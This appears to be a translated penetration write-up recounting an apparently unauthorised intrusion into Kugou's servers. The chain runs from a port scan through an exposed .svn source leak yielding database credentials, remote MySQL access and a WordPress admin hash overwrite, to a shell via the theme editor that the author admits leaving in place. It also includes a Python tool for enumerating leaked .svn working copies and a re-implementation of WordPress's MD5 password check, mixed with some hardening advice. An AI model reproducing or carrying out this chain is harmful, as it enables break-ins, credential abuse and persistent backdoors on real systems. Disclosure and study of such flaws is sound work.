Kugou: an easy penetration through vulnerabilities exposes a fragile security architecture

Source: Internet
Author: User
Tags: wordpress, blog

Today I was going to watch an episode of a drama and then sleep for a hundred years. I didn't expect Tudou to be hijacked. -_-|!
So I opened Kugou Music to listen to a live stream and then sleep. -_-|!
Let's go and take a look! Let's Go!~ PS: xsser, may I ask, does this get a Rank of 40 or 60?
(In view of the lasting impact on Kugou's overall architecture, the detailed description has been blurred; for the unblurred version contact nightwi3h@qq.com.)
No.0 Analysis and judgment:

Kugou, as a vendor whose main business is streaming media, must run a large fleet of servers: CDN nodes, load distribution, P2P management and so on. The target is the intranet database!

The difficulty is how to set Kugou's large number of CDN nodes aside and find the fragile system boundary behind them.

No.1 Information gathering:

Unfortunately Google is behind the wall, so Baidu it is. Found two domain names with no CDN in front of them: xxx1.kugou.com [113.106.x.x3] and xxx2.kugou.com [183.60.x.x]. The 183.60 range belongs to a certain security O&M service provider; it is full of anti-DDoS instances, with plenty of CDN as well. Give that one up.

Scan 113.106.x.x3/24 (only the useful results are kept):

  
113.106.x.x1 H3C Router
113.106.x.x3 3306
113.106.x.x7 3306
113.106.x.x9 3306
113.106.x.x9 80

Analysis: the hosts behind the H3C router look like Kugou's own. Pay attention to what follows :)

Pointed SRCWVS [http://www.srcwork.com] at the web service, and it easily turned up an SVN source-code leak: http://113.106.x.x9/admin/x/xfig/.svn/text-base/test.inc.php.svn-base (the .svn-base copy has an extension the PHP handler does not process, so the web server returns the PHP source verbatim instead of executing it):


<?php
// Leaked test.inc.php as recovered from .svn/text-base; passwords are redacted on this page.
$DbConfig['default'] = array(
    'db_type'       => 'mysql',
    'db_charset'    => 'utf8',
    'db_persistent' => false,
    'db_host'       => '10.10.10.7',
    'db_user'       => 'admin',
    'db_passwd'     => 'jxx',
    'db_name'       => 'mmv',
);
// Recommendation database configuration.
// (The key name is garbled on the page; 'tuijian', "recommended", matches the comment above.)
$DbConfig['tuijian'] = array(
    'db_type'       => 'mysql',
    'db_charset'    => 'utf8',
    'db_persistent' => false,
    'db_host'       => '10.10.10.3',
    'db_user'       => 'outtransql',
    'db_passwd'     => 'xxoo',
    'db_name'       => 'tuijian',
);

(This yields the source of Kugou's PHP framework and the connection details for its intranet databases.)
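What a practitioner does next with a leak like this is enumerate the whole working copy rather than fetch one file. The following is an added example, not code from the original write-up or from Kugou: it parses an exposed pre-1.7 `.svn/entries` file, derives the `.svn/text-base/<name>.svn-base` URL that returns each file's raw source, and includes the path check a vhost or WAF rule should carry on the defensive side. `BASE_URL` is the page's redacted leak location; `SAMPLE_ENTRIES` is constructed here to illustrate the format-10 layout, and `parse_entries`, `leak_urls` and `should_block` are names of my own.

```python
# Added example, not part of the original write-up or any Kugou code:
# enumerate a leaked Subversion working copy from its exposed .svn/entries
# file, map every file to the text-base URL that serves its raw source,
# and show the path check that blocks VCS metadata directories.

BASE_URL = "http://113.106.x.x9/admin/x/xfig/"   # redacted path from the page

# Constructed sample of a format-10 (SVN 1.6) entries file: the first line is
# the format number, each entry ends with form feed + newline, and the fields
# inside an entry are newline-separated (name, kind, revision, url, root, ...).
SAMPLE_ENTRIES = (
    "10\n"
    "\n"                                               # the "." entry has an empty name
    "dir\n"
    "1234\n"
    "http://svn.internal.example/repo/trunk/admin/x/xfig\n"
    "http://svn.internal.example/repo\n"
    "\x0c\n"
    "test.inc.php\n"
    "file\n"
    "\n\n\n\n\n\n\n\n"
    "2012-01-01T00:00:00.000000Z\n"
    "d41d8cd98f00b204e9800998ecf8427e\n"
    "\x0c\n"
    "config\n"
    "dir\n"
    "\x0c\n"
    "index.php\n"
    "file\n"
    "\x0c\n"
)

VCS_DIRS = {".svn", ".git", ".hg", ".bzr", "CVS"}


def parse_entries(text):
    """Return [(name, kind), ...] for every entry except the directory itself."""
    items = []
    for i, chunk in enumerate(text.split("\x0c\n")):
        lines = chunk.split("\n")
        if i == 0:
            lines = lines[1:]              # the first chunk starts with the format number
        if len(lines) < 2 or not lines[0]:
            continue                       # "" is the "." entry; the trailing chunk is empty
        items.append((lines[0], lines[1]))
    return items


def leak_urls(base_url, entries_text):
    """Map each entry to the next URL to fetch: the pristine copy for files,
    the nested entries file for subdirectories (recurse on those)."""
    base = base_url.rstrip("/") + "/"
    urls = {}
    for name, kind in parse_entries(entries_text):
        if kind == "file":
            urls[name] = base + ".svn/text-base/" + name + ".svn-base"
        elif kind == "dir":
            urls[name + "/"] = base + name + "/.svn/entries"
    return urls


def should_block(request_path):
    """Defensive side: deny any request whose path contains a VCS metadata
    directory as a segment, regardless of what is requested beneath it."""
    return any(seg in VCS_DIRS for seg in request_path.split("/"))


if __name__ == "__main__":
    for name, url in sorted(leak_urls(BASE_URL, SAMPLE_ENTRIES).items()):
        print(name, "->", url)
    print(should_block("/admin/x/xfig/.svn/text-base/test.inc.php.svn-base"))
```

Subversion 1.7 and later replaced `entries` with an SQLite `.svn/wc.db` and keep pristine copies under `.svn/pristine/`, so the same exposure looks different but is no less fatal; the fix is to deploy from an export rather than a checkout and to deny every `.svn`/`.git` path at the web server, not just to delete the one file that was found.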

No.3 Analysis:

The x9 source looks like a PHP framework Kugou developed in-house. Its security is decent; simple code-level vulnerabilities are basically absent. Still, we would like a shell first. The framework gives us nothing and the database is on the intranet, so what now? Here comes the bottleneck. Give me the length of a song. Oh, I see: a dev/test box like this usually has its database sitting not far from the machine itself. Let's look for a pattern.

No.4 Discovering the databases:


Intranet (from the leaked config)    Public (from the scan)
10.10.10.7                           113.106.x.x7
10.10.10.3                           113.106.x.x3
10.10.10.9                           113.106.x.x9

Got it. The last octet of each intranet address matches a public address that the scan already showed with 3306 open, so the same MySQL instances should be reachable from outside with the leaked credentials. And apparently 3306 isn't firewalled at all.

Cmd> mysql -h 113.106.x.x3 -u outtransql -p

  

Bingo! Database OK!


mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| StandardMusic      |
| UnStandardMusic    |
| Cloud              |
| Cr_debug           |
| Imagesetting       |
| Ios_jingpin        |
| Jinzhj             |
| Klok               |
| Kml                |
| Kugou01            |
| Kugoublog          |
| ...                |
+--------------------+
32 rows in set

Plenty of databases, and root is allowed to log in remotely as well (I have a hunch this is going to be fun -_-|). The check a practitioner wants here is which hosts each account, root above all, is permitted to connect from, and whether the server's bind-address confines the listener to the intranet; a root account with a wildcard host on a publicly reachable 3306 is the finding.

  

No.5 Breaking through from the database:

After the tests above, several of the databases we can connect to have rich content. But how do we use a database to get onto Kugou's intranet? Hold on: the KugouX library is a WordPress blog.

Sure enough, X.kugou.com turned out to be an unfinished blog. Well, don't blame me.


UPDATE kg_users SET user_pass = '21232f297a57a5a743894a0e4a801fc3' WHERE user_login = 'xadmin';

The value written here is the plain MD5 of "admin": WordPress still accepts a bare 32-character MD5 in user_pass as a legacy password format (and silently rehashes it on the next successful login), so with write access to the users table no cracking is needed. Log in to the WordPress admin backend, edit a theme template file, and we have a shell. OK!
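To make the step above concrete, here is an added example (my own Python, not code from the write-up, Kugou or WordPress) that re-implements the password check WordPress used at the time of this post: a stored value of 32 characters or less is compared against plain MD5, anything else goes through the portable phpass hash. It shows why `md5('admin')` written straight into `kg_users.user_pass` logs you in. Function names are mine; the phpass algorithm and the legacy MD5 branch are WordPress's documented behaviour.

```python
# Added example, not Kugou's or WordPress's code: WordPress's password check
# (legacy MD5 branch plus the portable phpass $P$ hash), re-implemented in
# Python to show why writing md5('admin') into user_pass is enough.
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass's own base64 variant: 6-bit groups, custom alphabet, no padding."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password, setting):
    """Portable phpass hash: md5(salt + pw), then 2**N rounds of md5(h + pw).
    Returns '*' for a malformed setting, which can never equal a stored hash."""
    if setting[:3] not in ("$P$", "$H$"):
        return "*"
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return "*"
    salt = setting[4:12]
    if len(salt) != 8:
        return "*"
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_hash(password, count_log2=13):
    """Generate a fresh hash. WordPress's PasswordHash(8, true) adds 5 on PHP 5,
    giving count_log2 = 13, hence the familiar '$P$B' prefix."""
    salt = _encode64(os.urandom(6), 6)
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def wp_check_password(password, stored):
    """Mirror of wp_check_password(): legacy MD5 for short values, phpass otherwise."""
    if len(stored) <= 32:
        # Legacy branch: a bare 32-char value is compared with plain md5(password).
        # WordPress rehashes it with phpass after a successful login.
        return hmac.compare_digest(stored, hashlib.md5(password.encode()).hexdigest())
    computed = phpass_crypt(password, stored)
    return computed != "*" and hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    # The value from the UPDATE statement above is md5('admin').
    print(wp_check_password("admin", "21232f297a57a5a743894a0e4a801fc3"))
    print(phpass_hash("s3cret"))
```

The lesson is less about MD5 than about trust boundaries: anyone who can write to the users table owns the site, so a database reachable from the Internet with application credentials lying in leaked source is the root cause, and a detection rule on unexpected `user_pass` changes (or on 32-character values appearing in that column) is the cheap alert to have.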

  

No.6 Simple architecture analysis:

From several web error messages it can be established that Kugou mounts /data0, /data1 and /data2 over NFS (or another network file system) shared between its web servers, which is why the main site's document root is visible from the shell on this one box:

Okay:


[/data2/www.kugou.com/]# ls
2012
Clientshare
Common
Default.html
Download
Fm2
...
Yueku
 

PS: looks like it's time to stop here. Stopping now. Defacing the homepage isn't my thing! (By the way, shame on whoever hijacked Tudou; I've tried everything, flushed DNS N+1 times and it still isn't fixed. Did someone change their NS? --)

To close: every change apart from the PHP shell has been reverted.


Solution:

Want to hear them? No.1, 2, 3, 4, 5, 6, 7, 8, 9 ... N.) This could be written up as a complete set of remediations (provided one has a better understanding of Kugou's architecture).

Wish you a better cool dog! I am a loyal user.
